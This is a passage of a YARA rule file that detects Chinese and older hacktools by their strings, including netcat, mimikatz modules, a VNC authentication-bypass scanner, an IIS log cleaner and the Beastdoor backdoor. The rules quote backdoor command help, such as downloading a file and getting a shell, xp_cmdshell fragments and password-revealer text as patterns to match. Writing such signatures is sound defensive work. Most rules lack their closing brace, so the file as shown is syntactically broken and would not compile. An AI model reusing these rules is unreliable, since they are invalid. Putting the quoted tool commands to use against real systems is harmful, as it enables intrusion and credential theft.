		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
		date = "23.11.14"
		score = 60
	strings:
		// Originals carry no ascii/wide modifier, which means ascii; made explicit.
		$s0 = "-ERR Invalid Command, Type [Help] For Command List" ascii fullword
		$s1 = "-ERR Get SMS Users ID Failed" ascii fullword
		$s2 = "Control Time Out 90 Secs, Connection Closed" ascii fullword
		$s3 = "-ERR Post SMS Failed" ascii fullword
		$s4 = "Current.hlt" ascii fullword
		$s6 = "Histroy.hlt" ascii fullword
		$s7 = "-ERR Send SMS Failed" ascii fullword
		$s12 = "-ERR Change Password <New Password>" ascii fullword
		$s17 = "+OK Send SMS Succussifully" ascii fullword
		$s18 = "+OK Set New Password: [%s]" ascii fullword
		$s19 = "CHANGE PASSWORD" ascii fullword
	condition:
		all of ($s*)
rule ByPassFireWall_zip_Folder_Inject {
	// Disclosed hacktool set (old stuff), Inject.exe: injection status strings and product tag.
	meta:
		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
		author = "Florian Roth"
		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
		date = "23.11.14"
		score = 60
	strings:
		$s11 = " Successfully" ascii fullword
		$s7 = "BtGRemote Pro; V1.5 B/{" ascii fullword
		$s6 = "Fail To Inject" ascii fullword
	condition:
		all of ($s*)
rule dat_NaslLib {
	// Chinese hacktool set, NaslLib.dll: Nessus/NASL library diagnostics bundled with the toolset.
	meta:
		description = "Chinese Hacktool Set - file NaslLib.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "fb0d4263118faaeed2d68e12fab24c59953e862d"
		date = "2015-06-13"
	strings:
		$s3 = "A FsSniffer backdoor seems to be running on this port%s" ascii fullword
		$s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" ascii fullword
		$s1 = "nessus_get_socket_from_connection: fd <%d> is closed" ascii fullword
	condition:
		filesize < 1360KB and uint16(0) == 0x5A4D and all of ($s*)
rule Hacktools_CN_Scan_BAT {
	// Disclosed hacktool set, scan.bat: batch "for /f" lines that filter scan output into host lists.
	meta:
		description = "Disclosed hacktool set - file scan.bat"
		author = "Florian Roth"
		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
		date = "17.11.14"
		score = 60
	strings:
		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii fullword
		$s4 = "start Http.exe %%a %http%" ascii fullword
		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" ascii fullword
		$s2 = "del host.txt /q" ascii fullword
		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" ascii fullword
		$s0 = "for /f %%a in (host.txt) do (" ascii fullword
	condition:
		// Batch text: no magic check; five of the six lines.
		5 of ($s*)
rule Dos_NC {
	// Chinese hacktool set, NC.EXE: netcat usage and error strings.
	meta:
		description = "Chinese Hacktool Set - file NC.EXE"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "57f0839433234285cc9df96198a6ca58248a4707"
		date = "2015-06-13"
	strings:
		$s5 = "UDP listen needs -p arg" ascii fullword
		$s4 = "Failed to execute shell, error = %s" ascii fullword
		$s3 = "post-rcv getsockname failed" ascii fullword
		$s2 = "invalid connection to [%s] from %s [%s] %d" ascii fullword
		$s1 = "nc -l -p port [options] [hostname] [port]" ascii fullword
	condition:
		filesize < 290KB and uint16(0) == 0x5A4D and all of ($s*)
rule portscanner {
	// Chinese hacktool set, portscanner.exe: short identifiers from a tiny CRTDLL-linked binary.
	meta:
		description = "Chinese Hacktool Set - file portscanner.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"
		date = "2015-06-13"
	strings:
		$s3 = "exitfc" ascii fullword
		$s2 = "CRTDLL.DLL" ascii fullword
		$s1 = ".533.net" ascii fullword
		$s0 = "PortListfNo" ascii fullword
	condition:
		filesize < 25KB and uint16(0) == 0x5A4D and all of ($s*)
rule CN_Tools_Vscan {
	// Chinese hacktool set, Vscan.exe: usage banner of a VNC authentication-bypass scanner.
	meta:
		description = "Chinese Hacktool Set - file Vscan.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"
		date = "2015-06-13"
	strings:
		$s5 = "-vn:%-15s:%-7d  connection closed" ascii fullword
		$s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." ascii fullword
		$s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" ascii fullword
		$s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" ascii fullword
		$s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" ascii fullword
	condition:
		filesize < 60KB and uint16(0) == 0x5A4D and 2 of ($s*)
rule SuperScan4 {
	// yarGen auto-generated rule for SuperScan4.exe; no header or size bound.
	meta:
		description = "Auto-generated rule on file SuperScan4.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "78f76428ede30e555044b83c47bc86f0"
	strings:
		// Originals carry no modifier (ascii); made explicit.
		$s7 = "CorExitProcess'msc#e" ascii
		$s6 = "REM'EBAqRISE" ascii
		$s2 = " td class=\"summO1\">" ascii
	condition:
		all of ($s*)
      
rule CmdShell64 {
	// Chinese hacktool set, CmdShell64.exe: service names, prompt and manifest fragment.
	meta:
		description = "Chinese Hacktool Set - file CmdShell64.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"
		date = "2015-06-13"
	strings:
		$s7 = "CmdShell" ascii fullword
		$s6 = "Hello Man 2015 !" wide fullword
		$s5 = "[Root@CmdShell ~]#" wide fullword
		$s4 = "ServiceSystemShell" wide fullword
		$s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
		$s2 = "ServiceCmdShell" ascii fullword
		$s1 = "C:\\Windows\\System32\\JAVASYS.EXE" wide fullword
	condition:
		filesize < 30KB and uint16(0) == 0x5A4D and 4 of ($s*)
rule Pc_rejoice {
	// Chinese hacktool set, rejoice.exe: dynamic-DNS update URLs and IP lookup endpoint.
	meta:
		description = "Chinese Hacktool Set - file rejoice.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
		date = "2015-06-13"
	strings:
		$s6 = "http://iframe.ip138.com/ic.asp" ascii fullword
		$s5 = "ListViewProcessListColumnClick!" ascii fullword
		$s4 = "No data to read.$Can not bind in port range (%d - %d)" wide fullword
		$s3 = "@ddns.oray.com/ph/update?hostname=" ascii fullword
		$s2 = "http://www.xxx.com/xxx.exe" ascii fullword
		$s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" ascii fullword
	condition:
		filesize < 3000KB and uint16(0) == 0x5A4D and 3 of ($s*)
rule MSSqlPass {
	// Chinese hacktool set, MSSqlPass.exe: Enterprise Manager PassView identification strings.
	meta:
		description = "Chinese Hacktool Set - file MSSqlPass.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7"
		date = "2015-06-13"
	strings:
		$s2 = "Enterprise Manager PassView" wide fullword
		$s1 = "empv.exe" wide fullword
		$s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide
	condition:
		filesize < 120KB and uint16(0) == 0x5A4D and all of ($s*)
rule SqlDbx_zhs {
	// Chinese hacktool set, SqlDbx_zhs.exe: embedded SQL query templates and support address.
	meta:
		description = "Chinese Hacktool Set - file SqlDbx_zhs.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "e34228345498a48d7f529dbdffcd919da2dea414"
		date = "2015-06-13"
	strings:
		$s15 = "S.last_login_time \"Last Login\", " ascii fullword
		$s12 = "mailto:support@sqldbx.com" ascii fullword
		$s11 = "L.login_policy_name AS \"Login Policy\", " ascii fullword
		$s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii
		$s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii
		$s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" ascii fullword
		$s0 = "S.failed_logins \"Failed Login Attempts\", " ascii fullword
	condition:
		// No size bound in this rule; PE magic plus four of seven strings.
		uint16(0) == 0x5A4D and 4 of ($s*)
rule CN_Hacktool_1433_Scanner {
	// Detects a Chinese MSSQL (port 1433) scanner by its port strings and cleanup commands.
	meta:
		description = "Detects a chinese MSSQL scanner"
		author = "Florian Roth"
		date = "12.10.2014"
		score = 40
	strings:
		$s0 = "1433" fullword wide
		$s1 = "1433V" wide
		$s2 = "del Weak1.txt" fullword ascii
		$s3 = "del Attack.txt" fullword ascii
		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" ascii fullword
		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" ascii fullword
	condition:
		// The original's "$magic = { 4d 5a } at 0" is the same test as the MZ uint16 check
		// (bytes 4D 5A read little-endian are 0x5A4D).
		uint16(0) == 0x5A4D and all of ($s*)
rule OtherTools_servu {
	// Chinese hacktool set, svu.exe: Upack-style header where "MZKERNEL32.DLL" sits at offset 0.
	meta:
		description = "Chinese Hacktool Set - file svu.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "5c64e6879a9746a0d65226706e0edc7a"
		date = "2015-06-13"
	strings:
		$s0 = "MZKERNEL32.DLL" ascii fullword
		$s1 = "UpackByDwing@" ascii fullword
		$s2 = "GetProcAddress" ascii fullword
		$s3 = "WriteFile" ascii fullword
	condition:
		// $s0 must begin the file; all strings are then required within the size bound.
		filesize < 50KB and $s0 at 0 and all of ($s*)
rule Sword1_5 {
	// Chinese hacktool set, Sword1.5.exe: online IP-lookup / MD5-lookup URLs and .NET form names.
	meta:
		description = "Chinese Hacktool Set - file Sword1.5.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
		date = "2015-06-13"
	strings:
		$s20 = " (*.txt)|*.txt" wide fullword
		$s19 = "OpenFileDialog1" wide fullword
		$s18 = "\\Set.ini" wide fullword
		$s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" wide fullword
		$s6 = "ListBox_Command" wide fullword
		$s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" wide fullword
		$s3 = "http://www.ip138.com/ip2city.asp" wide fullword
	condition:
		filesize < 400KB and uint16(0) == 0x5A4D and 4 of ($s*)
rule IISPutScannesr {
	// Chinese hacktool set, IISPutScannesr.exe: packer/crypter credit strings found in the binary.
	meta:
		description = "Chinese Hacktool Set - file IISPutScannesr.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"
		date = "2015-06-13"
	strings:
		$s2 = "-> come.to/f2f **************" ascii fullword
		$s1 = "yoda & M.o.D." ascii
	condition:
		filesize < 500KB and uint16(0) == 0x5A4D and all of ($s*)
rule Win32_klock {
	// Chinese hacktool set, klock.dll: the mimikatz "klock" module (French UI strings).
	meta:
		description = "Chinese Hacktool Set - file klock.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "7addce4434670927c4efaa560524680ba2871d17"
		date = "2015-06-13"
	strings:
		$s3 = "klock de mimikatz pour Windows" wide fullword
		$s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " wide fullword
		$s1 = "klock.dll" ascii fullword
	condition:
		filesize < 250KB and uint16(0) == 0x5A4D and all of ($s*)
rule kappfree_2 {
	// Chinese hacktool set, kappfree.dll: the mimikatz "kappfree" module (French UI strings).
	meta:
		description = "Chinese Hacktool Set - file kappfree.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"
		date = "2015-06-13"
	strings:
		$s4 = "kiwi\\mimikatz" wide fullword
		$s3 = "' introuvable !" wide fullword
		$s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" wide fullword
		$s1 = "kappfree.dll" ascii fullword
	condition:
		filesize < 200KB and uint16(0) == 0x5A4D and 2 of ($s*)
rule CleanIISLog {
	// Disclosed hacktool set (old stuff), CleanIISLog.exe: usage text of an IIS log cleaner.
	meta:
		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
		author = "Florian Roth"
		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
		date = "23.11.14"
		score = 60
	strings:
		$s20 = "Process Log File %s..." ascii fullword
		$s16 = "Service %s Stopped." ascii fullword
		$s12 = "Specified \".\" Will Clean All IP Record." ascii fullword
		$s11 = "Specified \"ALL\" Will Process All Log Files." ascii fullword
		$s10 = "Fatal Error: MFC initialization failed" ascii fullword
		$s9 = "msftpsvc" ascii fullword
		$s8 = "CleanIISLog Ver" ascii fullword
		$s2 = "LogFile - Specify Log File Which You Want Process." ascii fullword
		$s1 = "CleanIP - Specify IP Address Which You Want Clear." ascii fullword
	condition:
		// No header or size bound; five of the nine strings.
		5 of ($s*)
rule PLUGIN_TracKid {
	// Chinese hacktool set, TracKid.dll: author credits and log-path format strings.
	meta:
		description = "Chinese Hacktool Set - file TracKid.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"
		date = "2015-06-13"
	strings:
		$s5 = "%08x -- %s" ascii fullword
		$s4 = ".\\TracKid Log" ascii fullword
		$s3 = "TracKid.dll" ascii fullword
		$s2 = "Coded by prince" ascii fullword
		$s1 = ".\\TracKid Log\\%s.txt" ascii fullword
		$s0 = "E-mail: cracker_prince@163.com" ascii fullword
	condition:
		filesize < 200KB and uint16(0) == 0x5A4D and 3 of ($s*)
rule iKAT_wmi_rundll {
	// iKAT wmi_rundll.exe: generic runtime/library strings bounded by a very small file size.
	meta:
		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
		author = "Florian Roth"
		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
		date = "05.11.14"
		score = 65
	strings:
		$s7 = "CoUninitialize" ascii fullword
		$s6 = "VBScript" ascii fullword
		$s5 = "CRTDLL.dll" ascii fullword
		$s4 = "[LordPE]" ascii
		$s3 = "COMCTL32.dll" ascii fullword
		$s2 = "Win32 only!" ascii fullword
		$s1 = "Error!" ascii fullword
		$s0 = "This operating system is not supported." ascii fullword
	condition:
		// The size bound carries most of the specificity here; every string is required.
		filesize < 15KB and all of ($s*)
rule mimikatz_kirbi_ticket {
	// KiRBi ticket file for mimikatz: ASN.1 prefix that must begin the file.
	meta:
		description		= "KiRBi ticket for mimikatz"
		author			= "Benjamin DELPY (gentilkiwi)"
	strings:
		// Application-tagged SEQUENCE with version 5 and message type 22, wildcarded lengths.
		$asn1			= { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }
	condition:
		$asn1 at 0
rule BypassUacDll_7 {
	// yarGen auto-generated rule for BypassUacDll.aps: DLL name plus an MFC resource identifier.
	meta:
		description = "Auto-generated rule - file BypassUacDll.aps"
		author = "yarGen Yara Rule Generator"
		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
	strings:
		$s4 = "AFX_IDP_COMMAND_FAILURE" ascii fullword
		$s3 = "BypassUacDLL.dll" wide fullword
	condition:
		all of ($s*)
rule sig_238_letmein {
	// Disclosed hacktool set (old stuff), letmein.exe: NetAPI error/status messages.
	meta:
		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
		author = "Florian Roth"
		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
		date = "23.11.14"
		score = 60
	strings:
		$s16 = "get something from nt, hold by killusa." ascii fullword
		$s7 = "get in nt by name and null" ascii fullword
		$s6 = "Error get users from server!" ascii fullword
		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" ascii fullword
	condition:
		all of ($s*)
rule aolipsniffer {
	// yarGen auto-generated rule for aolipsniffer.exe: VB6 build-path and resource strings.
	meta:
		description = "Auto-generated rule on file aolipsniffer.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "51565754ea43d2d57b712d9f0a3e62b8"
	strings:
		// Originals carry no modifier (ascii); made explicit.
		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca" ascii
		$s7 = "Color Halftone Settings" ascii
		$s6 = "Layer ID Generator Base" ascii
		$s5 = "New Windows Thumbnail" ascii
		$s4 = "Version compatibility info" ascii
		$s3 = "FX Global Lighting Angle" ascii
		$s2 = "Color Transfer Settings" ascii
		$s1 = "dwGetAddressForObject" ascii
		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB" ascii
	condition:
		all of ($s*)
rule Beastdoor_Backdoor {
	// Detects the Beastdoor backdoor by its command-help lines and ICQ (mirabilis) HTTP request.
	meta:
		description = "Detects the backdoor Beastdoor"
		author = "Florian Roth"
		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
		score = 55
	strings:
		// Originals carry no ascii/wide modifier (ascii); made explicit.
		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" ascii fullword
		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" ascii fullword
		$s14 = "DeleteService ServiceName        -->Delete A Service" ascii fullword
		$s11 = "Shell                            -->Get A Shell" ascii fullword
		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" ascii fullword
		$s7 = "Host: wwp.mirabilis.com:80" ascii fullword
		$s2 = "http://IP/a.exe a.exe            -->Download A File" ascii fullword
		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" ascii fullword
		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" ascii fullword
	condition:
		// Any two of the nine strings; no header or size bound.
		2 of ($s*)
rule mswin_check_lm_group {
	// Chinese hacktool set, mswin_check_lm_group.exe: group-membership checker usage text.
	meta:
		description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"
		date = "2015-06-13"
	strings:
		$s3 = "-D    default user Domain" ascii fullword
		$s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" ascii fullword
		$s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." ascii fullword
	condition:
		filesize < 380KB and uint16(0) == 0x5A4D and all of ($s*)
rule WMI_vbs : APT {
	// WMI VBScript tool: detected by its ASCII-art banner echo line.
	meta:
		description = "WMI Tool - APT"
		author = "Florian Roth"
		release_date = "2013-11-29"
		confidential = false
		score = 70
	strings:
		// Original carries no modifier (ascii); made explicit.
		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$" ascii
	condition:
		all of ($s*)
rule CN_Toolset_sig_1433_135_sqlr {
	// Detects sqlr.exe from a disclosed Chinese toolset: MSSQL connection banner and xp_cmdshell use.
	meta:
		description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
		author = "Florian Roth"
		reference = "http://qiannao.com/ls/905300366/33834c0c/"
		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
		hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"
		date = "2015/03/30"
		score = 70
	strings:
		$s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
		$s12 = "xp_cmdshell '" ascii fullword
		$s11 = ";DATABASE=master" ascii fullword
		$s0 = "Connect to %s MSSQL server success. Type Command at Prompt." ascii fullword
	condition:
		all of ($s*)
rule CN_Tools_pc {
	// Chinese hacktool set, pc.exe: service name, file-name format and path fragments.
	meta:
		description = "Chinese Hacktool Set - file pc.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "5cf8caba170ec461c44394f4058669d225a94285"
		date = "2015-06-13"
	strings:
		$s4 = "/.MIKY" ascii fullword
		$s3 = "Qy001Service" ascii fullword
		$s2 = "%s%08x.001" ascii fullword
		$s0 = "\\svchost.exe" ascii fullword
	condition:
		filesize < 300KB and uint16(0) == 0x5A4D and all of ($s*)
rule portscan {
	// yarGen auto-generated rule for portscan.exe: two status lines printed by the scanner.
	meta:
		description = "Auto-generated rule on file portscan.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "a8bfdb2a925e89a281956b1e3bb32348"
	strings:
		// Originals carry no modifier (ascii); made explicit.
		$s6 = "0    :PORTSCAN READY." ascii
		$s5 = "0    :SCAN BEGUN ON PORT:" ascii
	condition:
		all of ($s*)
rule Ms_Viru_v {
	// Chinese hacktool set, v.exe: console messages of a local privilege-escalation helper.
	meta:
		description = "Chinese Hacktool Set - file v.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"
		date = "2015-06-13"
	strings:
		$s6 = "The exploit thread was unable to map the virtual 8086 address space" ascii fullword
		$s5 = "Hey,how can racle work without ur command ?" ascii fullword
		$s4 = "Success! Commander." ascii fullword
		$s3 = "OH,Sry.Too long command." ascii fullword
		$s2 = "Easy Usage Version -- Edited By: racle@tian6.com" ascii fullword
		$s1 = "c:\\windows\\system32\\command.com /c " ascii fullword
	condition:
		filesize < 100KB and uint16(0) == 0x5A4D and 3 of ($s*)
rule CN_Tools_MyUPnP {
	// Chinese hacktool set, MyUPnP.exe: manifest description, executable name and loader error text.
	meta:
		description = "Chinese Hacktool Set - file MyUPnP.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "15b6fca7e42cd2800ba82c739552e7ffee967000"
		date = "2015-06-13"
	strings:
		$s3 = "LOADER ERROR" ascii fullword
		$s2 = "myupnp.exe" ascii fullword
		$s1 = "<description>BYTELINKER.COM</description>" ascii fullword
	condition:
		filesize < 1500KB and uint16(0) == 0x5A4D and all of ($s*)
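rule Mimikatz_Memory_Rule_2 : APT {
	// Mimikatz in memory: the sekurlsa module prefix plus one of the artefacts seen in a dump.
	meta:
		description = "Mimikatz Rule generated from a memory dump"
		// The author name was duplicated ("Florian Roth - Florian Roth") in the original meta.
		author = "Florian Roth"
		type = "memory"
		score = 80
	strings:
		$s0 = "sekurlsa::" ascii
		$x1 = "cryptprimitives.pdb" ascii
		$x2 = "Now is t1O" ascii fullword
		$x4 = "ALICE123" ascii
		$x5 = "BOBBY456" ascii
	condition:
		// $s0 is mandatory; any one $x string confirms.
		$s0 and 1 of ($x*)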
rule AppInitHook {
	// AppInitGlobalHooks-Mimikatz, AppInitHook.dll: PDB path, hooked target name and mhook
	// disassembler source paths.
	meta:
		description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"
		author = "Florian Roth"
		reference = "https://goo.gl/Z292v6"
		hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"
		date = "2015-07-15"
		score = 70
	strings:
		$s6 = "VoidFunc" ascii fullword
		$s5 = "mhook\\disasm-lib\\disasm_x86.c" wide fullword
		$s4 = "mhook\\disasm-lib\\disasm.c" wide fullword
		$s3 = "]X86Instruction->OperandSize >= Operand->Length" wide fullword
		$s2 = "mimikatz.exe" wide fullword
		$s1 = "AppInitHook.dll" ascii fullword
		$s0 = "\\Release\\AppInitHook.pdb" ascii
	condition:
		filesize < 500KB and uint16(0) == 0x5A4D and 4 of ($s*)
rule SQLTools {
	// Chinese hacktool set, SQLTools.exe: Delphi DB component names and vendor copyright.
	meta:
		description = "Chinese Hacktool Set - file SQLTools.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"
		date = "2015-06-13"
	strings:
		$s7 = "Copyright (C) Kibosoft Corp. 2001-2006" wide fullword
		$s6 = "DBINSERT" wide fullword
		$s5 = "DBN_DELETE" wide fullword
		$s4 = "TUPFILEFORM" wide fullword
		$s3 = "www.1285.net" wide fullword
		$s2 = "LOADER ERROR" ascii fullword
		$s1 = "DBN_POST" wide fullword
	condition:
		filesize < 2350KB and uint16(0) == 0x5A4D and all of ($s*)
rule hscan_gui {
	// Chinese hacktool set, hscan-gui.exe: MFC application and executable names.
	meta:
		description = "Chinese Hacktool Set - file hscan-gui.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "1885f0b7be87f51c304b39bc04b9423539825c69"
		date = "2015-06-13"
	strings:
		$s3 = "Hscan Application " wide fullword
		$s1 = "RestTool.EXE" ascii fullword
		$s0 = "Hscan.EXE" wide fullword
	condition:
		filesize < 550KB and uint16(0) == 0x5A4D and all of ($s*)
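rule x_way2_5_sqlcmd {
	// Chinese hacktool set, sqlcmd.exe: loader-stub error messages and a fixed import set,
	// bounded to a narrow 20KB-23KB size window.
	meta:
		description = "Chinese Hacktool Set - file sqlcmd.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"
	strings:
		$s1 = "LOADER ERROR" fullword ascii
		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
		$s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
		// $s11 in the original duplicated this exact value; with "all of them" a duplicate
		// adds nothing, so it was dropped.
		$s4 = "kernel32.dll" fullword ascii
		$s5 = "VirtualAlloc" fullword ascii
		$s6 = "VirtualFree" fullword ascii
		$s7 = "VirtualProtect" fullword ascii
		$s8 = "ExitProcess" fullword ascii
		$s9 = "user32.dll" fullword ascii
		$s16 = "MessageBoxA" fullword ascii
		$s10 = "wsprintfA" fullword ascii
		$s12 = "GetProcAddress" fullword ascii
		$s13 = "GetModuleHandleA" fullword ascii
		$s14 = "LoadLibraryA" fullword ascii
		$s15 = "odbc32.dll" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them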
rule tools_NTCmd {
	// Chinese hacktool set, NTCmd.exe: pipecmd invocation templates, usage line and banners.
	meta:
		description = "Chinese Hacktool Set - file NTCmd.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"
		date = "2015-06-13"
	strings:
		$s6 = "NTcmd>" ascii fullword
		$s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" ascii fullword
		$s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" ascii fullword /* PEStudio Blacklist: os */
		$s3 = "pipecmd \\\\%s -U:%s -P:%s %s" ascii fullword
		$s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" ascii fullword
		$s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" ascii fullword
	condition:
		filesize < 80KB and uint16(0) == 0x5A4D and 2 of ($s*)
rule datPcShare {
	// Chinese hacktool set, datPcShare.exe: PcShare product strings and an Upack-style header string.
	meta:
		description = "Chinese Hacktool Set - file datPcShare.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"
		date = "2015-06-13"
	strings:
		$s4 = "QQ:4564405" wide fullword
		$s3 = "PcShare" wide fullword
		$s2 = "MZKERNEL32.DLL" ascii fullword
		$s1 = "PcShare.EXE" wide fullword
	condition:
		filesize < 500KB and uint16(0) == 0x5A4D and all of ($s*)
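// WAF-Bypass.exe: $s2 ("User-Agent:") and $s4 ("www.example.com") are common
// in benign HTTP clients, so the condition requires 5 of the 6 strings; the
// author e-mail and the "RemoteThread" / "Connect To Server" error texts
// carry the specificity.
rule WAF_Bypass {
    meta:
        description = "Chinese Hacktool Set - file WAF-Bypass.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"
    strings:
        $s1 = "Email: blacksplitn@gmail.com" fullword wide
        $s2 = "User-Agent:" fullword wide
        $s3 = "Send Failed.in RemoteThread" fullword ascii
        $s4 = "www.example.com" fullword wide
        $s5 = "Get Domain:%s IP Failed." fullword ascii
        $s6 = "Connect To Server Failed." fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 7992KB and 5 of them
}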
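// ASPACK.EXE (the ASPack compressor GUI itself, not ASPack-packed payloads).
// No MZ or filesize guard: the three wide strings are the whole check, so a
// hit on non-PE data (e.g. a document mentioning the tool) is possible.
rule ASPack_ASPACK {
    meta:
        description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
        author = "Florian Roth"
        date = "23.11.14"
        score = 60
        hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
    strings:
        $s0 = "ASPACK.EXE" fullword wide
        $s5 = "CLOSEDFOLDER" fullword wide
        $s10 = "ASPack compressor" fullword wide
    condition:
        all of them
}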
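// pscan2 (Linux port scanner). Condition is only "2 of them" with no ELF
// header check; $s8 and $s10 are generic error texts, so a benign network
// tool containing both could match. The pscan banner/usage strings
// ($s0, $s1, $s9) are the reliable indicators.
rule LinuxHacktool_eyes_pscan2 {
    meta:
        description = "Linux hack tools - file pscan2"
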